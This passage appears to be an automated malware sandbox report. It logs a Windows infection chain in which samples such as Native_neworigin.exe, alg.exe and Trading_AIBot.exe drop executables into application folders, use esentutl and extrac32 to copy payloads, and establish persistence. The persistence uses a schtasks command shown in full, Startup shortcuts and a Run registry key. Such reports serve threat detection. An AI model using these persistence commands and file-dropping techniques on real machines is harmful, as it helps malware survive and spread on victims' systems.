                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zFM.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Juqmtmya.PIFJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFFile created: C:\Users\Public\Libraries\aymtmquJ.pifJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
                      Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeFile created: C:\Windows\System32\alg.exeJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                      Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JuqmtmyaJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JuqmtmyaJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,15_2_02E0AB1C
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
